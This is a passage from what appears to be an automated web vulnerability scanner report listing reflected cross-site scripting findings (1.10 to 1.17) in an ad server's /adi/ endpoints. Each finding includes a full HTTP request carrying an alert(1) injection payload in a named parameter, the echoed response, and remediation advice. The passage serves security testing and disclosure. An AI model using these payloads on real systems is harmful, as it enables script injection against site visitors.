1.10. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0460"-alert(1)-"3194ac5b21c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957c0460"-alert(1)-"3194ac5b21c&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6996
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:35 GMT
Expires: Fri, 26 Nov 2010 20:48:35 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957c0460"-alert(1)-"3194ac5b21c&_pn=1781348&redirect=http://www.progressive.com/insurance/loyalty/immediate-rewards.aspx?&code=9903600308");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

1.11. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cf61"-alert(1)-"0ee0ae8ace8 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=17813489cf61"-alert(1)-"0ee0ae8ace8&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6085
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:37 GMT
Expires: Fri, 26 Nov 2010 20:48:37 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2,594 Template Name = Banner Creative (Flas
...[SNIP]...
3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=17813489cf61"-alert(1)-"0ee0ae8ace8&redirect=http://www.progressive.com/insurance/savings-plus/price-and-service.aspx?&code=9903600312");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

1.12. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e76e9"-alert(1)-"4c92364cc13 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0e76e9"-alert(1)-"4c92364cc13&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6996
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:29 GMT
Expires: Fri, 26 Nov 2010 20:48:29 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0e76e9"-alert(1)-"4c92364cc13&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/loyalty/immediate-rewards.aspx?&code=9903600308");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opa
...[SNIP]...

1.13. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24b4b"-alert(1)-"3c253612db8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a72924b4b"-alert(1)-"3c253612db8&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6996
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:16 GMT
Expires: Fri, 26 Nov 2010 20:48:16 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
.net/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a72924b4b"-alert(1)-"3c253612db8&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/loyalty/immediate-rewards.aspx?&code=9903600308");
var fscUrl = url;

...[SNIP]...

1.14. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [adimpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the adimpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb913"-alert(1)-"e8a2d1bf494 was submitted in the adimpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Vabb913"-alert(1)-"e8a2d1bf494&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:11 GMT
Expires: Fri, 26 Nov 2010 20:47:11 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Vabb913"-alert(1)-"e8a2d1bf494&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3
...[SNIP]...

1.15. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [adimpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the adimpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d8ee'-alert(1)-'93cfb988593 was submitted in the adimpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va6d8ee'-alert(1)-'93cfb988593&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:11 GMT
Expires: Fri, 26 Nov 2010 20:47:11 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va6d8ee'-alert(1)-'93cfb988593&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3
...[SNIP]...

1.16. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [clickTAGPrefix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the clickTAGPrefix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a78e"-alert(1)-"37bc81f05c0 was submitted in the clickTAGPrefix parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4a78e"-alert(1)-"37bc81f05c0&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:13 GMT
Expires: Fri, 26 Nov 2010 20:47:13 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4a78e"-alert(1)-"37bc81f05c0&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=";
var dcadvurl = escape(advurl);
var dcminversion = 9;
var dccreativewidth = "728";
var dccreativeheight = "90";
var dcwmode = "opaque";
var dcbgcolor = ""
...[SNIP]...

1.17. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [clickTAGPrefix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the clickTAGPrefix request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b738'-alert(1)-'0c2a0e4571f was submitted in the clickTAGPrefix parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4b738'-alert(1)-'0c2a0e4571f&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
